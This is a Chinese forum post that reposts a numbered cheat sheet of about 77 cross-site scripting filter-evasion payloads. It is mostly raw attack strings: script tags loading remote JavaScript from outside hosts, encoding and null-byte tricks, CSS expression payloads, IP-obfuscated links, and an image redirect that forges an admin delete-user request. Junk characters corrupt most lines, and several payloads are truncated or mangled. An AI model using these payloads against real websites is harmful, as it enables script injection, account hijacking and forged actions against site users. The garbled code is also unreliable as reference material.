貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. V+ v2 J/ M- I4 w4 N* C3 Y! a: b/ ~/ V, ?- J6 j
(1)普通的XSS JavaScript注入
4 ~6 l) J- ^4 d1 w7 { <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ N, w- L: U% f& B' \& }
% b! g: {% A1 o; R4 |6 B8 V' e
(2)IMG标签XSS使用JavaScript命令& K2 x* m/ I. y& b3 t K, p: U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ @3 [7 g) |' E* P/ K, `4 l) s
! ]9 z8 l( C4 O( u V# r* y# ^ (3)IMG标签无分号无引号
. s# L$ j3 R. T2 X" ^ <IMG SRC=javascript:alert(‘XSS’)>
# i- m9 o" C; w( s' T3 H% I5 R; ^, |2 _3 Y/ _4 \
(4)IMG标签大小写不敏感
+ r& X% |8 `' E) M8 h <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ j- z0 h" B( y) e; X: y8 K3 r, A" b9 b' x5 I- E
(5)HTML编码(必须有分号)8 _3 G& l7 j3 P# w" A
<IMG SRC=javascript:alert(“XSS”)>
f' M: N( _) y! _0 ?" u/ y+ U8 |4 n' c5 X; G; k) y b
(6)修正缺陷IMG标签1 r- a2 n/ h3 Z3 q* Y9 A
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>1 k& n9 a( Z5 p
3 q* T7 ]! j# N( h5 y; R (7)formCharCode标签(计算器)
) u1 a" M$ g+ k1 E( W <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 u5 D' ^' K4 J3 t/ m5 J( o! a4 n) |: k1 P- Q# M3 h
(8)UTF-8的Unicode编码(计算器)
6 t: R, R V: M4 A$ D$ C <IMG SRC=jav..省略..S')>
) J6 U, o5 U0 ?6 t5 r
2 O" {' ?0 S, T; U (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ j& p* q! p( h Y9 r! z, H1 I0 { <IMG SRC=jav..省略..S')>
: B6 X5 n: @, l1 ~
; |4 y& _' f+ s) } (10)十六进制编码也是没有分号(计算器) W( {& G; M8 o& S
<IMG SRC=java..省略..XSS')>
$ Z% I1 v* e3 N4 ` S0 ^. `+ W# t$ |! J, L
(11)嵌入式标签,将Javascript分开" o5 R4 B2 U {
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 F& L+ O8 k5 h) n* M A
$ z& j* d* l6 B (12)嵌入式编码标签,将Javascript分开 C! m3 z+ D# [4 [5 T3 p' a# }
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 V( Y/ |: n& T- U( S+ G
+ f3 I! u0 g- G# u (13)嵌入式换行符5 K& d6 l* ^7 N
<IMG SRC=”jav ascript:alert(‘XSS’);”>& W' z2 |, ~6 l4 ?1 c4 E; I) U, T
9 \1 A8 U' v) I4 d# g) M
(14)嵌入式回车
& T7 `; d% g6 r7 r" a4 Y <IMG SRC=”jav ascript:alert(‘XSS’);”>
5 P5 O1 i7 q/ S+ S2 @
" S& s- m+ b6 i0 d4 H, K( U* j (15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 S2 F c9 t+ b% E6 ?' \5 m4 k6 v- h <IMG SRC=”javascript:alert(‘XSS‘)”>2 R; q' H5 @" U- |2 ?" j; K7 ?
- h& b& H& Q+ L (16)解决限制字符(要求同页面)
7 \- c& g+ X3 [: `9 w0 T9 ?' H <script>z=’document.’</script>
* C5 c1 g/ q% h1 V( x$ Y# C% }0 B0 z <script>z=z+’write(“‘</script>$ h2 ~1 U# s c8 q* Y# @, T. V0 c6 t
<script>z=z+’<script’</script>+ }% ~+ |7 E" l h
<script>z=z+’ src=ht’</script>) D0 e2 i+ _, p' G' S
<script>z=z+’tp://ww’</script>6 b1 t6 ~' A2 h
<script>z=z+’w.shell’</script>
0 m: [, F, S4 A6 F1 C <script>z=z+’.net/1.’</script>8 e; {- n! B" q* t
<script>z=z+’js></sc’</script>% |5 X' r! W' e% j) }+ y9 B4 r' l$ K
<script>z=z+’ript>”)’</script>
1 W7 D+ N' b: n6 b! B' i <script>eval_r(z)</script>
- j; L3 N- L" z+ a! u$ z
) i6 L# v. x" L' a (17)空字符
/ V: Y9 K: T* F perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out( x8 ?- _4 {* u
4 r5 V! D# d( `; k0 C$ T& G
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用0 c; [9 A8 y/ V/ s" [+ j! Q$ ]
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 H# ?0 j ]% ~
2 z- @8 \3 E" w6 v, ^& @2 H (19)Spaces和meta前的IMG标签& _9 f2 U# `% } L* E( ^
<IMG SRC=” � javascript:alert(‘XSS’);”>3 s- g1 k6 J3 S N# e
4 j( ^) d7 z P8 [
(20)Non-alpha-non-digit XSS
/ n6 q! l! F: ?6 H4 [( h <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> d9 l# a" A# [% D! t1 ]
- u1 d0 {8 B- [6 G5 T (21)Non-alpha-non-digit XSS to 2" s, ]( D" z% P8 ~# y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: c' ~& g5 v* o! Q( _2 S4 ?2 s2 Z! J( g9 O0 t( y/ V) ~
(22)Non-alpha-non-digit XSS to 3% ?7 t. I& f+ ]+ ~' X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 w; m) r* t* M" j [4 I
8 U4 L9 [3 K( j* |' @ u (23)双开括号2 ?# [# j/ [( @) n8 E s1 g
<<SCRIPT>alert(“XSS”);//<</SCRIPT>; Y Q+ ~6 W8 k w" U3 |- V1 U* L
s1 c" r7 z* p" A (24)无结束脚本标记(仅火狐等浏览器); a# l9 Z1 `" Y- Z3 j1 x6 ]
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>, a0 I, a: G9 F2 G+ Y
+ Q# o7 X( L. M8 Z M (25)无结束脚本标记26 t1 I. s8 N- P: J
<SCRIPT SRC=//3w.org/XSS/xss.js>
# }1 u2 V4 P4 f; x- ~( L* K: x ^! ]5 W0 a$ Y1 ?1 @7 A6 F
(26)半开的HTML/JavaScript XSS, ]4 J- h/ P. Y& \, X( V: h. @
<IMG SRC=”javascript:alert(‘XSS’)”' W2 B5 P; I6 B! H% b K
& a" k o: C5 h/ t& E# j% Q (27)双开角括号) Y3 z; W7 l& ~: \* _
<iframe src=http://3w.org/XSS.html </ U( ~# B. E4 n) m2 U C& d
; q7 R' P* F& d" N( ? (28)无单引号 双引号 分号' j# c9 [9 }& F: m2 {% S4 k" x
<SCRIPT>a=/XSS/
7 R9 d* u! j) G& K( d alert(a.source)</SCRIPT>( d% S3 ]+ @5 o2 _5 u
u1 ~* }# X7 g% S' f7 q (29)换码过滤的JavaScript% ?3 X: l3 A/ N+ Z5 V2 ] x
\”;alert(‘XSS’);//' ]4 \! t9 P0 n% Q' W8 Y8 c
$ n, \. ~: I' A8 O$ z
(30)结束Title标签+ c; s/ k0 K9 d; \: S0 p- V
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>) i+ X7 }" U K+ u8 U5 |
4 B5 I: _7 j2 Z- v
(31)Input Image2 T3 k- n' u- B. W2 A" j! [) Y4 i
<INPUT SRC=”javascript:alert(‘XSS’);”>
# s' e7 j0 l' y1 O2 v& E
3 x1 Z/ D, N- E Y (32)BODY Image
% A4 i7 o8 B) w <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
% Y: H( [3 I" C- ]$ ~* z) {* A
E; M* r+ J/ | (33)BODY标签6 X! o; o$ h+ T; z: o& u E
<BODY(‘XSS’)>0 _8 ]' R) a) `
+ r6 A8 d4 g& @# h7 x
(34)IMG Dynsrc
* Z; e |, z! l) i <IMG DYNSRC=”javascript:alert(‘XSS’)”>
4 @% X2 d1 n% F7 v [0 l2 v) h8 x) x/ {% ^) j
(35)IMG Lowsrc
& O0 ^+ R# c9 }4 F( ]! [ <IMG LOWSRC=”javascript:alert(‘XSS’)”>
3 D6 `& G4 p$ X( S/ F+ ]
7 q! p- H* P! Z$ I( r9 _, y (36)BGSOUND; x1 ~7 R1 M/ w7 y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>* B* ^* t& V$ U" P% D) e9 O
, w. J1 Q* A0 G# Q$ G
(37)STYLE sheet& ^0 c" N9 x& M* P" s
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
; m, h- m) P b
9 \ d7 H" L! `0 n$ T% {7 d (38)远程样式表# o7 |5 L7 w& J: g
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! y# g8 ?4 o6 s0 q, L2 J7 @7 ~9 M# l5 D/ ^/ {
(39)List-style-image(列表式)
2 u' j' ^% d, F4 {* I <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS6 k# t. R% K" ?! f) G" T
3 o$ P6 H# @7 l9 R
(40)IMG VBscript6 P6 m, i' B1 ?4 s# G) `' c# M
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 \9 g0 F8 e2 K5 i
3 {. d) Z% G- _
(41)META链接url
& b" {$ q& a7 K* w <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>. L7 g2 z& o' B
+ w# N9 c: E# K+ O
(42)Iframe1 K+ L. ?- q& ^) x
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 t5 v8 S( Z3 l7 O* L4 m; q' T$ g
% q- O- P: S, v( A2 B/ ` (43)Frame/ L' @( |) n% c/ b
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
2 e, P. b' ?* L9 S
) T' R6 w: } s$ O (44)Table# h3 Y4 ~! h) X) H4 a! C
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. k, }: D; o7 b* p( e1 P
: y& @2 B1 m# ~0 m! M4 ~ (45)TD
! l, A7 M( e/ Z, v" N* F <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 O5 @& W6 l- Y' C% [8 z0 ~* O
S1 @6 I; G# y7 B; h: b (46)DIV background-image
1 L1 v' e" S9 i5 ]/ k* d <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- b) y5 L, p$ W9 x4 u5 m# L
. ]1 e7 k2 \9 E7 M9 s* N5 x (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ E3 J; m3 l; l1 D: j$ O" D2 x) R <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
, _+ c7 a6 t# c* \1 W9 O
5 p$ f( s: f. t8 S2 j; \2 h( g" M (48)DIV expression
7 @( ?4 j) p$ |( {3 c: z, l <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# O( k/ P% ]" Z" P! C- D/ V0 P
$ Y: x' }! g" p" k# h$ C! e3 L (49)STYLE属性分拆表达, K) G" ^( }, V2 i& j9 P
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>+ ~ k- w; _4 `
1 d) e9 w6 `# p1 {: U! u
(50)匿名STYLE(组成:开角号和一个字母开头)" T$ y4 K7 R& E( v0 o. J( Y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& \5 m% P8 b& z) g1 q. {; T0 n
- [, r, R/ R" \ @1 l" q( R# U9 X (51)STYLE background-image+ i, V9 n* H' x* G% Y# M
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>% f( j/ z& E: o0 N
* M% j4 z4 M" ~
(52)IMG STYLE方式
4 O3 V7 ^& T! O4 s% B exppression(alert(“XSS”))’>4 l% @) {6 Q& G( h
2 H' ]: c/ D% t3 a6 n
(53)STYLE background
}/ d) O! K& E- y( y- m <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 G; U, m9 {: {9 o% l
( Q, I! X* S3 J( Y# N (54)BASE) s2 v3 V2 F) A. W% z4 w
<BASE HREF=”javascript:alert(‘XSS’);//”>3 b+ a6 x) F" O3 w# k
; @* s: s3 J9 |
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ f! k$ U1 e/ }2 M( p0 v <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 }$ B* Z2 {/ ]: \9 j- `* ]
7 N4 c' P% C3 X (56)在flash中使用ActionScrpt可以混进你XSS的代码) I) u9 e d4 q% i; [- d
a=”get”;
. p0 c% j; A: I1 c1 a& t b=”URL(\”"; ]# _$ o2 `$ K4 |- w; Q7 t0 q
c=”javascript:”;
$ [6 k4 f& \8 ` d=”alert(‘XSS’);\”)”;
4 F/ s3 `3 U/ I- d ` eval_r(a+b+c+d);' w/ S' Q% L- e1 F* t
+ s8 L! ]3 x- I! r8 t4 m
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
# `8 q2 t/ f3 P& x% z8 v <HTML xmlns:xss> M9 I7 _+ u2 \2 \9 X. e) q/ D
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>+ x0 h4 ^: h% Q0 h
<xss:xss>XSS</xss:xss>
, D4 i8 ?, H0 \5 Y </HTML>
9 z0 S" l! C4 I* f0 I7 \. U2 f: x9 a2 D3 V2 v" y1 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用9 a! q+ C& K! d# T' _+ s
<SCRIPT SRC=””></SCRIPT>
3 d6 H% E: D7 x, n, ~6 ]2 f# R3 q* n" x
(59)IMG嵌入式命令,可执行任意命令3 e4 I$ O8 a% o2 t
<IMG SRC=”http://www.XXX.com/a.php?a=b”>' H ^" @- @& ?
' p6 g2 U& C) s! F$ W/ o (60)IMG嵌入式命令(a.jpg在同服务器)' H" \" y6 F9 N Y
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 x- S5 `/ b4 |2 |# o4 d9 k t% U
3 g% h& M: {& g% b p (61)绕符号过滤2 J" L6 o+ e e! ~" R# |* \; _7 y
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
. T o% t" t4 K& q+ z6 a1 a! ^# L5 ?
(62)
; I& w9 r0 J: t/ C9 V3 J <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 K5 S6 f6 N& x5 j" R5 E9 H
- g) Q; _' g( [+ I# k (63)( G P0 Y& r- W( _
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>, [" t: y8 |- ^
7 Z) E2 A1 r: W8 e+ f7 @
(64)
- q4 P* ?5 h T+ E# H. @ <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# ]+ p0 s3 W# ~7 t( d5 I5 j. s9 `
(65)
2 A/ A0 c4 b; r8 f9 | <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 J) q$ A+ N* G. d) d) Y, {" Q- B
(66)/ x/ l! v' m/ s8 u
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>) d B& k# [% l; B7 t# V" Z
$ e+ W% m, a) j# \( x* `, X# p- k
(67)- K) f- `( C5 h1 K5 b9 Y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>. x/ N* I' w- F! ?4 v
6 k$ t: O! H; o ~4 d, C
(68)URL绕行- G4 m. r1 L0 K. ^9 D
<A HREF=”http://127.0.0.1/”>XSS</A>
$ P7 r9 H% V2 K7 z: A$ ~4 V9 Q! K' Y2 v
(69)URL编码
/ N6 }; G. O+ @! B0 z# `1 Z <A HREF=”http://3w.org”>XSS</A>
3 Y( g `* t6 ^( G- G% g. ^% q7 l
: |! q8 ]+ m$ ]8 j! Z; d8 |. p (70)IP十进制5 ~+ g9 G7 s0 G- n
<A HREF=”http://3232235521″>XSS</A>
9 r8 {5 e P8 n8 L' Z- E' W8 x0 |0 L3 J- ?
(71)IP十六进制
2 Y0 j* p2 x* q! [2 `% I5 R1 u <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* m7 }6 T+ F5 F: w% R
- A3 H# n7 k- ], H3 Z (72)IP八进制
; s; A" l) @8 V+ c/ j <A HREF=”http://0300.0250.0000.0001″>XSS</A>
* J9 R" c, e& l- W0 [1 E" z4 G6 \3 x# h: H3 F
(73)混合编码
1 N4 s) ?# A _% j( ^: V3 d$ ? <A HREF=”h
- ]/ }+ d( } T tt p://6 6.000146.0×7.147/”">XSS</A>' O' I/ ~" H- Q, P. m
: D8 s9 X( X! `, N1 p7 U4 p (74)节省[http:]) X" k' r0 O- [& H% M& ?
<A HREF=”//www.google.com/”>XSS</A>( p; f& U7 Y! D' m& u1 p7 }
" y+ D' l+ y: G! [3 L (75)节省[www]
; _2 J! c B9 J4 m. ?- e <A HREF=”http://google.com/”>XSS</A>/ Q# O$ M# m) H, I
3 B% S4 f" F+ |' D (76)绝对点绝对DNS
* {& M' c- `! x$ X' P" u <A HREF=”http://www.google.com./”>XSS</A>
' j! H' W$ S, _5 w2 b/ `, L. c' e' @; @' a: Y' D W
(77)javascript链接
* l4 {# ^$ E. l% @0 d& U6 m <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对